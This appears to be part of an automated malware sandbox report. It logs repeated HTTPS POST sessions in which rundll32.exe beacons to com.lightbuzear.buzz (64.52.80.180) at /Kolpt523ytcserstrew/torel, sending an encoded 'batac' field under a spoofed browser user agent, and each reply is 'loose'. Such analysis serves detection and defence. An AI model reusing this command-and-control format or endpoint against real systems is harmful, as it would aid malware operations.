              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:43 UTC120INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:43 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:43 UTC120INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              72192.168.2.224924464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:44 UTC120OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:44 UTC120OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:45 UTC121INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:44 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:45 UTC121INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              73192.168.2.224924564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:45 UTC121OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:45 UTC122OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:46 UTC123INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:45 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:46 UTC123INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              74192.168.2.224924664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:46 UTC123OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:46 UTC123OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:47 UTC125INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:47 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:47 UTC125INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              75192.168.2.224924764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:47 UTC125OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:47 UTC125OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:48 UTC126INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:48 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:48 UTC126INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              76192.168.2.224924864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:48 UTC126OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:48 UTC127OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:49 UTC128INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:49 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:49 UTC128INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              77192.168.2.224924964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:49 UTC128OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:49 UTC128OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:50 UTC129INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:50 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:50 UTC130INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              78192.168.2.224925064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:50 UTC130OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:50 UTC130OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:51 UTC131INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:51 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:51 UTC131INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              79192.168.2.224925164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:52 UTC131OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:52 UTC132OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:52 UTC133INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:52 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:52 UTC133INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              8192.168.2.224918064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:34 UTC14OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:34 UTC15OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:34 UTC16INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:34 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:34 UTC16INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              80192.168.2.224925264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:53 UTC133OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:53 UTC133OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:53 UTC134INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:53 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:53 UTC135INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              81192.168.2.224925364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:54 UTC135OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:54 UTC135OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
